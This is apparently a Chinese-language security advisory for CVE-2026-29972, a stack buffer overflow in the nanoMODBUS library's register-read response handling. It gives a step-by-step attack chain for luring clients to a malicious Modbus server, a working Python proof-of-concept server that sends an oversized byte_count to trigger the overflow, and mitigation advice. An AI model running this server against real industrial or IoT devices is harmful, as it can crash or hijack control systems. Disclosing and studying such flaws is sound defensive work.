CVE-2026-29972 nanoMODBUS栈缓冲区溢出漏洞

漏洞信息

漏洞编号

CVE-2026-29972

漏洞类型

栈缓冲区溢出

CVSS评分

8.2 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

nanoMODBUS

漏洞概述

nanoMODBUS库在v1.22.0及之前的版本中存在严重的安全漏洞，具体位于nanomodbus.c文件的recv_read_registers_res()函数内。当客户端调用nmbs_read_holding_registers()或nmbs_read_input_registers()读取寄存器时，库会直接根据服务器响应中的byte_count字段向调用者提供的缓冲区写入数据。由于系统在写入前未验证该字段是否与客户端请求的数量相匹配，恶意的Modbus TCP服务器可以发送包含超大byte_count（如250）的响应包。这将导致多达248字节的受控数据溢出缓冲区，攻击者可利用此漏洞在目标设备上执行任意代码。

技术细节

该漏洞的根源是典型的缺乏边界检查。在正常的Modbus通信中，服务器响应的byte_count应与客户端请求的寄存器数量相对应。然而，受影响的nanoMODBUS实现存在逻辑缺陷，它先执行内存拷贝操作，后验证（或根本未验证）数据长度。具体而言，当客户端请求少量寄存器（例如只请求1个寄存器，栈上仅分配少量空间）时，攻击者控制的服务器可以响应一个声称包含125个寄存器（byte_count=250）的数据包。recv_read_registers_res()函数会忠实地将这250字节的数据复制到为少量数据分配的栈缓冲区中，从而导致栈溢出。这种溢出允许攻击者覆盖返回地址或函数指针，由于攻击者控制了溢出数据的内容，因此可以劫持控制流并实现远程代码执行（RCE）。鉴于该漏洞通过网络（AV:N）触发且无需用户交互（UI:N），其对物联网（IoT）和工业控制系统（ICS）构成严重威胁。

攻击链分析

STEP 1

1. 侦察

攻击者识别出网络中运行着受影响版本nanoMODBUS库（v1.22.0及以下）的客户端设备，该设备主动连接外部Modbus TCP服务器。

STEP 2

2. 诱导连接

攻击者搭建恶意的Modbus TCP服务器，通过网络配置劫持、中间人攻击或直接诱导目标客户端连接至该恶意服务器。

STEP 3

3. 发送恶意响应

当目标客户端调用读取寄存器函数时，恶意服务器响应一个特制的Modbus数据包。该数据包将byte_count字段设置为最大值（如250），而不管客户端实际请求的数量是多少。

STEP 4

4. 触发溢出

目标客户端的nanoMODBUS库接收到响应后，由于缺乏长度校验，将大量恶意数据拷贝到栈上的小缓冲区中，触发栈缓冲区溢出。

STEP 5

5. 执行代码

溢出数据覆盖了栈上的返回地址或关键指针，控制流被劫持。攻击者利用溢出载荷在目标设备上执行任意代码，获取设备控制权。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import socket
import struct

# PoC for CVE-2026-29972: Malicious Modbus TCP Server
# This script simulates a server that sends a response with a large byte_count
# to trigger the stack-based buffer overflow in nanoMODBUS client.

HOST = '0.0.0.0'
PORT = 502

print(f"Listening for connections on {PORT}...")

with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
    s.bind((HOST, PORT))
    s.listen()
    conn, addr = s.accept()
    with conn:
        print(f"Connected by {addr}")
        # Wait for client request (e.g., Function Code 0x03 Read Holding Registers)
        data = conn.recv(1024)
        if data:
            # Extract Transaction ID from request to maintain session
            transaction_id = data[0:2]
            protocol_id = b'\x00\x00' # Modbus Protocol
            unit_id = data[6:7]
            function_code = b'\x03' # Read Holding Registers

            # Exploit: Set byte_count to 250 (0xFA)
            # The client likely requested much less, causing a buffer overflow
            byte_count = b'\xFA'

            # Payload: 250 bytes of 'A' (attacker controlled data)
            payload = b'A' * 250

            # Construct the MBAP Header + PDU
            # Length = UnitID(1) + FuncCode(1) + ByteCount(1) + Payload(250) = 253
            length = 1 + 1 + 1 + len(payload)
            length_bytes = struct.pack('>H', length)

            malicious_packet = transaction_id + protocol_id + length_bytes + unit_id + function_code + byte_count + payload
            
            print("Sending malicious response to trigger overflow...")
            conn.sendall(malicious_packet)

影响范围

nanoMODBUS <= v1.22.0

防御指南

临时缓解措施

如果无法立即升级，建议实施严格的网络分段，确保Modbus客户端只能与受信任且经过验证的服务器通信。此外，可部署网络入侵检测系统（IDS）监控异常的Modbus响应包大小，以检测潜在的攻击尝试。